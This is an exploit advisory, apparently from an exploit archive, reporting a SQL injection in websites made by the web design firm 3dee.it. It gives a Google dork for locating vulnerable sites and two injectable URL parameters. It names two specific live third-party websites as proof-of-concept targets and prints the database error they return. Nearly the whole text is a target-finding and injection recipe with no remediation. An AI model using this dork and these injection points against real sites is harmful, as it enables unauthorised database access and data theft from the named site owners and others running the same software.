#################################################################################################
# Exploit Title : Powered By 3dee.it Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 04/06/2018
# Vendor Homepage : 3dee.it
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89
#################################################################################################
# Google Dork : intext:''powered by 3dee''
# Exploit : /dettaglio-notizia.asp?id_news=[SQL Injection]
# Exploit : /news-details.asp?id=[SQL Injection]
#################################################################################################
# Example Site => comonuoto.it/dettaglio-notizia.asp?id_news=317' => [ Proof of Concept ] => archive.is/W3mA4
# Example Site => italianpack.com/eng/news-details.asp?id=14' => [ Proof of Concept ] => archive.is/Lhmo5
# SQL-DB Error =>
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
Il driver ODBC non supporta le proprietà richieste.
/eng/news-details.asp, line 13
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################